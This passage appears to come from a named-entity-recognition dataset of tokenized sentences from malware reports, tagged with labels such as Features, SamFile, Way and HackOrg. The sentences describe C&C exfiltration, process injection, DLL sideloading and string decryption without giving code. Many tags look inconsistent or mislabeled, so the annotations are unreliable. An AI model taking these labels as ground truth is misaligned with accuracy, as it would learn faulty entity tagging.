"O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "upload", - "data", - "to", - "C&C" - ], - "ner_tags": [ - "B-Features", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "exfiltrates", - "data", - "over", - "its", - "C&C", - "channel." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "acquire", - "a", - "list", - "of", - "the", - "running", - "processes", - "and", - "their", - "loaded", - "modules" - ], - "ner_tags": [ - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "collect", - "information", - "about", - "currently", - "running", - "processes,", - "including:", - "name,", - "process", - "identifier", - "(PID),", - "parent", - "process", - "PID,", - "number", - "of", - "threads,", - "token", - "owner,", - "token", - "domain,", - "process", - "creation", - "time,", - "and", - "command", - "line" - ], - "ner_tags": [ - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "B-HackOrg", - "O", - "I-Features", - "O", - "I-Features", - "O", - "I-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "collect", - "information", - "about", - "loaded", - "modules", - "for", - "each", - "of", - "the", - "running", - "processes" - ], - "ner_tags": [ - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "0x10000025get", - "handle", - "of", - "the", - "process", - "with", - "specified", - "PID" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "enumerates", - "running", - "processes" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "get", - "information", - "about", - "processes", - "running", - "on", - "a", - "system" - ], - "ner_tags": [ - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "stored", - "in", - "DataS5", - "(for", - "dba)", - "and", - "DataS6", - "(for", - "micros)", - "registry", - "values", - "within", - "one", - "of", - "the", - "following", - "registry", - "keys" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windows", - "registry", - "Run", - "key" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GetComputerName", - "API" - ], - "ner_tags": [ - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "GetTickCount", - "Windows", - "API" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PeekNamedPipe", - "Windows", - "API", - "function" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "information", - "about", - "specific", - "registry", - "keys" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "queries", - "the", - "Registry", - "for", - "ORACLE", - "MICROS", - "RES", - "3700", - "POS", - "version,", - "database", - "passwords", - "and", - "other", - "configuration", - "data" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "injected", - "into", - "one", - "of", - "the", - "processes", - "specified", - "by", - "the", - "C&C" - ], - "ner_tags": [ - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "module", - "is", - "injected", - "into", - "one", - "of", - "the", - "processes", - "specified", - "by", - "the", - "C&C" - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "injected", - "only", - "into", - "processes", - "running", - "under", - "WOW64." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "its", - "injection", - "into", - "one", - "of", - "the", - "following", - "processes" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "0x10000012inject", - "and", - "execute", - "received", - "module", - "in", - "specified", - "process" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "injected", - "first," - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "inject", - "a", - "networking", - "module" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "inject", - "processes", - "that", - "are", - "expected", - "to", - "communicate", - "over", - "the", - "network" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "0x0AInject", - "and", - "execute", - "received", - "module", - "in", - "specified", - "process" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "0x0BInject", - "and", - "execute", - "received", - "module", - "in", - "specified", - "process" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "inject", - "and", - "execute", - "received", - "module", - "in", - "specified", - "process" - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "scanning", - "selected", - "IP", - "addresses" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "scan", - "specific", - "IP", - "addresses" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IP", - "addresses", - "intended", - "for", - "scanning", - "and", - "the", - "special", - "“ping”", - "IP", - "address" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "scanning", - "IPs", - "specified", - "in", - "the", - "command", - "data", - "to", - "collect", - "additional", - "information", - "about", - "the", - "environment" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "scan", - "of", - "the", - "selected", - "IP", - "addresses" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "downloaded", - "from", - "the", - "C&C", - "along", - "with", - "the", - "ModScan", - "module" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile" - ] - }, - { - "tokens": [ - "parsing", - "payload", - "received", - "in", - "the", - "C&C", - "responses" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "download", - "additional", - "payloads", - "and", - "C&C", - "commands" - ], - "ner_tags": [ - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TCP", - "ports", - "50123" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "and", - "2638" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "by", - "sending", - "a", - "specially", - "crafted", - "TCP", - "packet" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way" - ] - }, - { - "tokens": [ - "sends", - "a", - "hardcoded", - "TDS", - "4.2", - "&", - "5.0", - "Login", - "Packet", - "(Figure", - "6)", - "to", - "the", - "specified", - "IP", - "address", - "on", - "port", - "2638" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "transmitted", - "using", - "the", - "lightweight", - "networking", - "module," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Version", - "of", - "the", - "Oracle" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "information", - "about", - "the", - "database", - "server", - "and", - "the", - "TDS", - "versions", - "used" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "sending", - "an", - "HTTP", - "Post", - "message" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "module", - "uses", - "HTTP", - "and", - "port", - "80." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "avoid", - "system", - "processes", - "that", - "might", - "attract", - "attention", - "if", - "caught", - "communicating", - "over", - "the", - "network" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HTTP", - "POST", - "or", - "GET", - "methods" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "HTTP", - "for", - "command", - "and", - "control" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "stored", - "between", - "data", - "xml", - "tags", - "(<data>%version%</data>)", - "of", - "the", - "response", - "from", - "the", - "service" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encrypted", - "payload,", - "containing", - "the", - "main", - "functionality", - "of", - "the", - "dropper,", - "is", - "stored", - "in", - "the", - "dropper’s", - "resources", - "as", - "bitmaps", - "named", - "from", - "A", - "to", - "L." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "being", - "the", - "payloads", - "stored", - "in", - "the", - "resources" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encrypted", - "within", - "the", - "main", - "module’s", - "code." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "with", - "username", - "set", - "to", - "the", - "built-in", - "dba", - "and", - "a", - "hardcoded", - "password,", - "which", - "is", - "potentially", - "the", - "default", - "password", - "in", - "some", - "RES", - "3700", - "POS", - "versions." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "hash", - "of", - "the", - "dropped", - "loader", - "to", - "change", - "with", - "each", - "execution," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "creating", - "a", - "Windows", - "service" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "create", - "a", - "new", - "service", - "for", - "persistence." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Decompiled", - "code", - "responsible", - "for", - "loading", - "the", - "payload", - "from", - "the", - "binary’s", - "resources," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Communication", - "with", - "the", - "C&C", - "is", - "encrypted", - "using", - "AES", - "in", - "CBC", - "mode" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "XORed", - "with", - "the", - "first", - "4", - "bytes", - "of", - "the", - "AES", - "key", - "used", - "to", - "encrypt", - "the", - "message." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "encrypts", - "communication", - "with", - "C&C", - "using", - "AES", - "in", - "CBC", - "mode" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "Windows", - "Command", - "Shell", - "to", - "execute", - "the", - "initial", - "dropper." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "use", - "Registry", - "Run", - "key", - "for", - "persistence" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "inject", - "it’s", - "modules", - "into", - "various", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "gathers", - "username", - "and", - "computer", - "name", - "from", - "victim", - "machines", - "and", - "reports", - "them", - "to", - "the", - "C&C", - "in", - "initial", - "message." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "attack", - "revolves", - "around", - "a", - "DLL", - "sideloading" - ], - "ner_tags": [ - "O", - "B-OffAct", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DLL", - "sideloading", - "scenario,", - "the", - "malicious", - "loader", - "(ffmpeg.dll)", - "would", - "replace", - "the", - "clean", - "dependency;" - ], - "ner_tags": [ - "B-SamFile", - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "DLL", - "sideloading" - ], - "ner_tags": [ - "B-Way", - "O" - ] - }, - { - "tokens": [ - "DLL", - "sideloading" - ], - "ner_tags": [ - "B-Way", - "O" - ] - }, - { - "tokens": [ - "encoded", - "malware" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "encrypted", - "payload" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "malicious", - "encoded", - ".ico", - "payload" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "generate", - "the", - "HTTP", - "request" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "these", - "appear", - "to", - "be", - "maliciously", - "patched", - "versions", - "of", - "the", - "legitimate", - "ffmpeg.dll" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "GetSystemTimeAsFileTime", - "Api", - "call" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "which", - "initiates", - "the", - "payload", - "download" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "malware", - "tries", - "to", - "login", - "and", - "get", - "access", - "to", - "the", - "victim", - "server", - "via", - "brute", - "force." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "tries", - "to", - "get", - "access", - "to", - "the", - "server", - "via", - "brute", - "force" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "malware", - "samples", - "are", - "packed", - "with", - "UPX", - "Packer." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Upon", - "unpacking", - "a", - "sample" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "malware", - "uses", - "a", - "set", - "of", - "credentials", - "that", - "is", - "hard", - "coded", - "into", - "the", - "malware", - "binary," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hard-coded", - "credentials", - "for", - "brute", - "forcing." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "from", - "the", - "decrypted", - "configuration" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "malware", - "then", - "de-XORs", - "other", - "strings,", - "with", - "the", - "hard-coded", - "key" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Most", - "of", - "the", - "strings", - "are", - "de-XOR’d", - "in", - "a", - "function" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "simply", - "de-XOR", - "the", - "entire", - "binary" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Also", - "the", - "de-XOR’d", - "strings," - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Once", - "the", - "malware", - "has", - "de-XOR’d", - "all", - "its", - "strings,", - "it", - "invokes", - "a", - "method", - "named", - "go." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "we", - "find", - "an", - "XOR", - "loop", - "that", - "decrypts", - "this", - "configuration." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "as", - "a", - "hard-coded", - "XOR", - "key" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "we", - "find", - "an", - "XOR", - "loop" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "produces", - "strings", - "including", - "a", - "commandline", - "usage:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "can", - "be", - "set", - "via", - "the", - "command-line", - "as", - "well." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "parses", - "command-line", - "options" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "data", - "will", - "be", - "published", - "on", - "our", - "TOR", - "darknet", - "sites." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "this", - "snippet", - "of", - "code", - "invokes", - "ptrace", - "with", - "PT_DENY_ATTACH", - "(0x1f)", - "which", - "will", - "kill", - "the", - "process", - "if", - "a", - "debugger", - "is", - "currently", - "attached," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "embedded", - ".NET", - "injector", - "and", - "PE", - "payload(s)." - ], - "ner_tags": [ - "O", - "B-SamFile", - "B-SamFile", - "B-SecTeam", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "embedded", - "payloads", - "of", - "one", - "of", - "the", - "IronPython", - "scripts." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "the", - "main", - "task", - "of", - "loading", - "malware", - "is", - "done", - "by", - "an", - "embedded", - "process", - "injector." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IronNetInjector", - "is", - "made", - "of", - "an", - "IronPython", - "script", - "that", - "contains", - "a", - ".NET", - "injector", - "and", - "one", - "or", - "more", - "payloads." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Contain", - "an", - "encrypted", - ".NET", - "injector", - "and", - "one", - "or", - "more", - "encrypted", - "PE", - "payloads." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Embedded", - ".NET", - "injector", - "and", - "payload(s)", - "are", - "encoded", - "with", - "Base64", - "and", - "encrypted", - "with", - "Rijndael." - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "script", - "with", - "embedded", - ".NET", - "injector", - "and", - "ComRAT", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "the", - "embedded", - "payloads", - "in", - "the", - "IronPython", - "scripts," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "embedded", - "malware:" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "embedded", - "files", - "in", - "the", - "scripts" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "These", - "scripts", - "contain", - "an", - "embedded", - "PE", - "loader", - "to", - "execute", - "an", - "embedded", - "malware", - "payload." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "embedded", - ".NET", - "injector" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "which", - "in", - "turn", - "injects", - "the", - "payload(s)", - "into", - "its", - "own", - "or", - "a", - "remote", - "process." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "contains", - "the", - "ability", - "to", - "inject", - ".NET", - "assemblies", - "into", - "unmanaged", - "processes." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Features", - "B-Way", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "payload", - "is", - "either", - "loaded", - "into", - "its", - "own", - "process", - "or", - "a", - "remote", - "one." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "remote", - "process", - "the", - "payload", - "gets", - "injected", - "to." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "second", - "option", - "is", - "used", - "with", - "the", - "PID", - "of", - "explorer.exe", - "to", - "load", - "the", - "ComRAT", - "payload", - "reflectively", - "into", - "the", - "process." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "injector", - "is", - "its", - "ability", - "to", - "load", - "an", - "assembly", - "into", - "an", - "unmanaged", - "process." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "load", - "an", - "assembly", - "into", - "an", - "unmanaged", - "process." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "method", - "InjectAssembly", - "is", - "used", - "to", - "inject", - "a", - ".NET", - "assembly", - "into", - "a", - "native", - "process" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Features", - "I-Features", - "B-Way", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Function", - "and", - "variable", - "names", - "are", - "obfuscated" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Strings", - "are", - "encrypted" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "scripts", - "are", - "obfuscated", - "to", - "prevent", - "easy", - "detection." - ], - "ner_tags": [ - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Decoded", - "IronPython", - "script" - ], - "ner_tags": [ - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "the", - "Rijndael", - "decryption", - "key", - "is", - "passed." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "get", - "decoded", - "and", - "decrypted" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "decryption", - "key", - "is", - "passed", - "as", - "an", - "argument" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "full-blown", - "PE", - "injection", - "tools", - "able", - "to", - "load", - "a", - "native", - "x86/64", - "payload", - "reflectively", - "into", - "a", - "remote", - "process." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerShell", - "Empire’s", - "ReflectivePEInjection", - "script" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "method", - "Invoke", - "is", - "used", - "to", - "inject", - "a", - "native", - "PE", - "into", - "a", - "remote", - "process", - "and", - "InvokeVoid", - "to", - "call", - "any", - "exported", - "function", - "of", - "the", - "injected", - "payload." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "As", - "a", - "command", - "line", - "argument" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windows", - "task", - "XML", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "task", - "is", - "used", - "to", - "start", - "an", - "IronPython", - "script" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "The", - "task’s", - "description", - "is", - "PythonUpdateSrvc", - "and", - "it", - "runs", - "either", - "on", - "Windows", - "startup", - "when", - "a", - "user", - "logs", - "in", - "or", - "when", - "one", - "of", - "two", - "system", - "events", - "get", - "created:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "Windows", - "task", - "XML" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "task", - "file", - "is", - "then", - "used", - "to", - "create", - "a", - "task", - "which", - "in", - "turn", - "starts", - "a", - "script", - "when", - "triggered." - ], - "ner_tags": [ - "O", - "I-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "Windows", - "task", - "XML", - "to", - "start" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "submitter", - "collected", - "the", - "files", - "from", - "different", - "places" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "is", - "accomplished", - "with", - "a", - "native", - "bootstrapper", - "DLL,", - "which", - "gets", - "injected", - "into", - "the", - "remote", - "process", - "and", - "prepares", - "it", - "so", - "a", - ".NET", - "assembly", - "can", - "be", - "injected", - "afterwards." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "B-Way", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DLL", - "gets", - "injected" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "output", - "is", - "then", - "parsed", - "to", - "the", - "targeted", - "process", - "ID", - "with", - "the", - "help", - "of", - "tasklist", - "filters." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Contains", - "the", - "imported", - "unmanaged", - "function", - "declarations", - "and", - "win32", - "structures/constants." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", 